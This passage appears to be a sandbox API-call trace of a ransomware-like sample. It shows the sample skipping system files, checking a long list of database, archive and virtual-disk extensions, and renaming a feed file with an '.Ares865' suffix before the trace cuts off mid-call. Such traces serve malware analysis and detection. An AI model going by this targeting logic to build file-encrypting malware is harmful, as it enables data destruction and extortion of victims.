HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.511] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.512] CloseHandle (hObject=0x118) returned 1 [0065.512] CloseHandle (hObject=0x164) returned 1 [0065.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.512] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfedc214c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft at Work~.feed-ms", cAlternateFileName="MICROS~1.FEE")) returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="aoldtz.exe") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="..") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="windows") returned -1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="bootmgr") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="temp") returned -1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="pagefile.sys") returned -1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="boot") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="ids.txt") returned 1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="ntuser.dat") returned -1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="perflogs") returned -1 [0065.512] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="MSBuild") returned -1 [0065.512] lstrlenW (lpString="Microsoft at Work~.feed-ms") returned 26 [0065.512] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 96 [0065.512] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Microsoft at Work~.feed-ms" | out: lpString1="Microsoft at Work~.feed-ms") returned="Microsoft at Work~.feed-ms" [0065.512] lstrlenW (lpString="Microsoft at Work~.feed-ms") returned 26 [0065.512] lstrlenW (lpString="Ares865") returned 7 [0065.512] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0065.513] lstrlenW (lpString=".dll") returned 4 [0065.513] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".dll") returned 1 [0065.513] lstrlenW (lpString=".lnk") returned 4 [0065.513] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".lnk") returned 1 [0065.513] lstrlenW (lpString=".ini") returned 4 [0065.513] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".ini") returned 1 [0065.513] lstrlenW (lpString=".sys") returned 4 [0065.513] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".sys") returned 1 [0065.513] lstrlenW (lpString="Microsoft at Work~.feed-ms") returned 26 [0065.513] lstrlenW (lpString="bak") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0065.513] lstrlenW (lpString="ba_") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0065.513] lstrlenW (lpString="dbb") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0065.513] lstrlenW (lpString="vmdk") returned 4 [0065.513] lstrcmpiW (lpString1="d-ms", lpString2="vmdk") returned -1 [0065.513] lstrlenW (lpString="rar") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0065.513] lstrlenW (lpString="zip") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0065.513] lstrlenW (lpString="tgz") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0065.513] lstrlenW (lpString="vbox") returned 4 [0065.513] lstrcmpiW (lpString1="d-ms", lpString2="vbox") returned -1 [0065.513] lstrlenW (lpString="vdi") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0065.513] lstrlenW (lpString="vhd") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0065.513] lstrlenW (lpString="vhdx") returned 4 [0065.513] lstrcmpiW (lpString1="d-ms", lpString2="vhdx") returned -1 [0065.513] lstrlenW (lpString="avhd") returned 4 [0065.513] lstrcmpiW (lpString1="d-ms", lpString2="avhd") returned 1 [0065.513] lstrlenW (lpString="db") returned 2 [0065.513] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0065.513] lstrlenW (lpString="db2") returned 3 [0065.513] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0065.513] lstrlenW (lpString="db3") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0065.514] lstrlenW (lpString="dbf") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0065.514] lstrlenW (lpString="mdf") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0065.514] lstrlenW (lpString="mdb") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0065.514] lstrlenW (lpString="sql") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0065.514] lstrlenW (lpString="sqlite") returned 6 [0065.514] lstrcmpiW (lpString1="eed-ms", lpString2="sqlite") returned -1 [0065.514] lstrlenW (lpString="sqlite3") returned 7 [0065.514] lstrcmpiW (lpString1="feed-ms", lpString2="sqlite3") returned -1 [0065.514] lstrlenW (lpString="sqlitedb") returned 8 [0065.514] lstrcmpiW (lpString1=".feed-ms", lpString2="sqlitedb") returned -1 [0065.514] lstrlenW (lpString="xml") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0065.514] lstrlenW (lpString="$er") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0065.514] lstrlenW (lpString="4dd") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0065.514] lstrlenW (lpString="4dl") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0065.514] lstrlenW (lpString="^^^") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0065.514] lstrlenW (lpString="abs") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0065.514] lstrlenW (lpString="abx") returned 3 [0065.514] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0065.514] lstrlenW (lpString="accdb") returned 5 [0065.514] lstrcmpiW (lpString1="ed-ms", lpString2="accdb") returned 1 [0065.514] lstrlenW (lpString="accdc") returned 5 [0065.515] lstrcmpiW (lpString1="ed-ms", lpString2="accdc") returned 1 [0065.515] lstrlenW (lpString="accde") returned 5 [0065.515] lstrcmpiW (lpString1="ed-ms", lpString2="accde") returned 1 [0065.515] lstrlenW (lpString="accdr") returned 5 [0065.515] lstrcmpiW (lpString1="ed-ms", lpString2="accdr") returned 1 [0065.515] lstrlenW (lpString="accdt") returned 5 [0065.515] lstrcmpiW (lpString1="ed-ms", lpString2="accdt") returned 1 [0065.515] lstrlenW (lpString="accdw") returned 5 [0065.515] lstrcmpiW (lpString1="ed-ms", lpString2="accdw") returned 1 [0065.515] lstrlenW (lpString="accft") returned 5 [0065.515] lstrcmpiW (lpString1="ed-ms", lpString2="accft") returned 1 [0065.515] lstrlenW (lpString="adb") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.515] lstrlenW (lpString="adb") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.515] lstrlenW (lpString="ade") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0065.515] lstrlenW (lpString="adf") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0065.515] lstrlenW (lpString="adn") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0065.515] lstrlenW (lpString="adp") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0065.515] lstrlenW (lpString="alf") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0065.515] lstrlenW (lpString="ask") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0065.515] lstrlenW (lpString="btr") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0065.515] lstrlenW (lpString="cat") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0065.515] lstrlenW (lpString="cdb") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0065.515] lstrlenW (lpString="ckp") returned 3 [0065.515] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0065.515] lstrlenW (lpString="cma") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0065.516] lstrlenW (lpString="cpd") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0065.516] lstrlenW (lpString="dacpac") returned 6 [0065.516] lstrcmpiW (lpString1="eed-ms", lpString2="dacpac") returned 1 [0065.516] lstrlenW (lpString="dad") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0065.516] lstrlenW (lpString="dadiagrams") returned 10 [0065.516] lstrcmpiW (lpString1="k~.feed-ms", lpString2="dadiagrams") returned 1 [0065.516] lstrlenW (lpString="daschema") returned 8 [0065.516] lstrcmpiW (lpString1=".feed-ms", lpString2="daschema") returned -1 [0065.516] lstrlenW (lpString="db-journal") returned 10 [0065.516] lstrcmpiW (lpString1="k~.feed-ms", lpString2="db-journal") returned 1 [0065.516] lstrlenW (lpString="db-shm") returned 6 [0065.516] lstrcmpiW (lpString1="eed-ms", lpString2="db-shm") returned 1 [0065.516] lstrlenW (lpString="db-wal") returned 6 [0065.516] lstrcmpiW (lpString1="eed-ms", lpString2="db-wal") returned 1 [0065.516] lstrlenW (lpString="dbc") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0065.516] lstrlenW (lpString="dbs") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0065.516] lstrlenW (lpString="dbt") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0065.516] lstrlenW (lpString="dbv") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0065.516] lstrlenW (lpString="dbx") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0065.516] lstrlenW (lpString="dcb") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0065.516] lstrlenW (lpString="dct") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0065.516] lstrlenW (lpString="dcx") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0065.516] lstrlenW (lpString="ddl") returned 3 [0065.516] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0065.516] lstrlenW (lpString="dlis") returned 4 [0065.516] lstrcmpiW (lpString1="d-ms", lpString2="dlis") returned 1 [0065.517] lstrlenW (lpString="dp1") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0065.517] lstrlenW (lpString="dqy") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0065.517] lstrlenW (lpString="dsk") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0065.517] lstrlenW (lpString="dsn") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0065.517] lstrlenW (lpString="dtsx") returned 4 [0065.517] lstrcmpiW (lpString1="d-ms", lpString2="dtsx") returned -1 [0065.517] lstrlenW (lpString="dxl") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0065.517] lstrlenW (lpString="eco") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0065.517] lstrlenW (lpString="ecx") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0065.517] lstrlenW (lpString="edb") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0065.517] lstrlenW (lpString="epim") returned 4 [0065.517] lstrcmpiW (lpString1="d-ms", lpString2="epim") returned -1 [0065.517] lstrlenW (lpString="fcd") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0065.517] lstrlenW (lpString="fdb") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0065.517] lstrlenW (lpString="fic") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0065.517] lstrlenW (lpString="flexolibrary") returned 12 [0065.517] lstrcmpiW (lpString1="ork~.feed-ms", lpString2="flexolibrary") returned 1 [0065.517] lstrlenW (lpString="fm5") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0065.517] lstrlenW (lpString="fmp") returned 3 [0065.517] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0065.517] lstrlenW (lpString="fmp12") returned 5 [0065.517] lstrcmpiW (lpString1="ed-ms", lpString2="fmp12") returned -1 [0065.517] lstrlenW (lpString="fmpsl") returned 5 [0065.517] lstrcmpiW (lpString1="ed-ms", lpString2="fmpsl") returned -1 [0065.517] lstrlenW (lpString="fol") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0065.518] lstrlenW (lpString="fp3") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0065.518] lstrlenW (lpString="fp4") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0065.518] lstrlenW (lpString="fp5") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0065.518] lstrlenW (lpString="fp7") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0065.518] lstrlenW (lpString="fpt") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0065.518] lstrlenW (lpString="frm") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0065.518] lstrlenW (lpString="gdb") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.518] lstrlenW (lpString="gdb") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.518] lstrlenW (lpString="grdb") returned 4 [0065.518] lstrcmpiW (lpString1="d-ms", lpString2="grdb") returned -1 [0065.518] lstrlenW (lpString="gwi") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0065.518] lstrlenW (lpString="hdb") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0065.518] lstrlenW (lpString="his") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0065.518] lstrlenW (lpString="ib") returned 2 [0065.518] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0065.518] lstrlenW (lpString="idb") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0065.518] lstrlenW (lpString="ihx") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0065.518] lstrlenW (lpString="itdb") returned 4 [0065.518] lstrcmpiW (lpString1="d-ms", lpString2="itdb") returned -1 [0065.518] lstrlenW (lpString="itw") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0065.518] lstrlenW (lpString="jet") returned 3 [0065.518] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0065.519] lstrlenW (lpString="jtx") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0065.519] lstrlenW (lpString="kdb") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0065.519] lstrlenW (lpString="kexi") returned 4 [0065.519] lstrcmpiW (lpString1="d-ms", lpString2="kexi") returned -1 [0065.519] lstrlenW (lpString="kexic") returned 5 [0065.519] lstrcmpiW (lpString1="ed-ms", lpString2="kexic") returned -1 [0065.519] lstrlenW (lpString="kexis") returned 5 [0065.519] lstrcmpiW (lpString1="ed-ms", lpString2="kexis") returned -1 [0065.519] lstrlenW (lpString="lgc") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0065.519] lstrlenW (lpString="lwx") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0065.519] lstrlenW (lpString="maf") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0065.519] lstrlenW (lpString="maq") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0065.519] lstrlenW (lpString="mar") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0065.519] lstrlenW (lpString="marshal") returned 7 [0065.519] lstrcmpiW (lpString1="feed-ms", lpString2="marshal") returned -1 [0065.519] lstrlenW (lpString="mas") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0065.519] lstrlenW (lpString="mav") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0065.519] lstrlenW (lpString="maw") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0065.519] lstrlenW (lpString="mdbhtml") returned 7 [0065.519] lstrcmpiW (lpString1="feed-ms", lpString2="mdbhtml") returned -1 [0065.519] lstrlenW (lpString="mdn") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0065.519] lstrlenW (lpString="mdt") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0065.519] lstrlenW (lpString="mfd") returned 3 [0065.519] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0065.519] lstrlenW (lpString="mpd") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0065.520] lstrlenW (lpString="mrg") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0065.520] lstrlenW (lpString="mud") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0065.520] lstrlenW (lpString="mwb") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0065.520] lstrlenW (lpString="myd") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0065.520] lstrlenW (lpString="ndf") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0065.520] lstrlenW (lpString="nnt") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0065.520] lstrlenW (lpString="nrmlib") returned 6 [0065.520] lstrcmpiW (lpString1="eed-ms", lpString2="nrmlib") returned -1 [0065.520] lstrlenW (lpString="ns2") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0065.520] lstrlenW (lpString="ns3") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0065.520] lstrlenW (lpString="ns4") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0065.520] lstrlenW (lpString="nsf") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0065.520] lstrlenW (lpString="nv") returned 2 [0065.520] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0065.520] lstrlenW (lpString="nv2") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0065.520] lstrlenW (lpString="nwdb") returned 4 [0065.520] lstrcmpiW (lpString1="d-ms", lpString2="nwdb") returned -1 [0065.520] lstrlenW (lpString="nyf") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0065.520] lstrlenW (lpString="odb") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.520] lstrlenW (lpString="odb") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.520] lstrlenW (lpString="oqy") returned 3 [0065.520] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0065.520] lstrlenW (lpString="ora") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0065.521] lstrlenW (lpString="orx") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0065.521] lstrlenW (lpString="owc") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0065.521] lstrlenW (lpString="p96") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0065.521] lstrlenW (lpString="p97") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0065.521] lstrlenW (lpString="pan") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0065.521] lstrlenW (lpString="pdb") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0065.521] lstrlenW (lpString="pdm") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0065.521] lstrlenW (lpString="pnz") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0065.521] lstrlenW (lpString="qry") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0065.521] lstrlenW (lpString="qvd") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0065.521] lstrlenW (lpString="rbf") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0065.521] lstrlenW (lpString="rctd") returned 4 [0065.521] lstrcmpiW (lpString1="d-ms", lpString2="rctd") returned -1 [0065.521] lstrlenW (lpString="rod") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0065.521] lstrlenW (lpString="rodx") returned 4 [0065.521] lstrcmpiW (lpString1="d-ms", lpString2="rodx") returned -1 [0065.521] lstrlenW (lpString="rpd") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0065.521] lstrlenW (lpString="rsd") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0065.521] lstrlenW (lpString="sas7bdat") returned 8 [0065.521] lstrcmpiW (lpString1=".feed-ms", lpString2="sas7bdat") returned -1 [0065.521] lstrlenW (lpString="sbf") returned 3 [0065.521] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0065.521] lstrlenW (lpString="scx") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0065.522] lstrlenW (lpString="sdb") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0065.522] lstrlenW (lpString="sdc") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0065.522] lstrlenW (lpString="sdf") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0065.522] lstrlenW (lpString="sis") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0065.522] lstrlenW (lpString="spq") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0065.522] lstrlenW (lpString="te") returned 2 [0065.522] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0065.522] lstrlenW (lpString="teacher") returned 7 [0065.522] lstrcmpiW (lpString1="feed-ms", lpString2="teacher") returned -1 [0065.522] lstrlenW (lpString="tmd") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0065.522] lstrlenW (lpString="tps") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0065.522] lstrlenW (lpString="trc") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.522] lstrlenW (lpString="trc") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.522] lstrlenW (lpString="trm") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0065.522] lstrlenW (lpString="udb") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0065.522] lstrlenW (lpString="udl") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0065.522] lstrlenW (lpString="usr") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0065.522] lstrlenW (lpString="v12") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0065.522] lstrlenW (lpString="vis") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0065.522] lstrlenW (lpString="vpd") returned 3 [0065.522] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0065.523] lstrlenW (lpString="vvv") returned 3 [0065.523] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0065.523] lstrlenW (lpString="wdb") returned 3 [0065.523] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0065.523] lstrlenW (lpString="wmdb") returned 4 [0065.523] lstrcmpiW (lpString1="d-ms", lpString2="wmdb") returned -1 [0065.523] lstrlenW (lpString="wrk") returned 3 [0065.523] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0065.523] lstrlenW (lpString="xdb") returned 3 [0065.523] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0065.523] lstrlenW (lpString="xld") returned 3 [0065.523] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0065.523] lstrlenW (lpString="xmlff") returned 5 [0065.523] lstrcmpiW (lpString1="ed-ms", lpString2="xmlff") returned -1 [0065.523] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.Ares865") returned 104 [0065.523] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0065.524] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.ares865"), 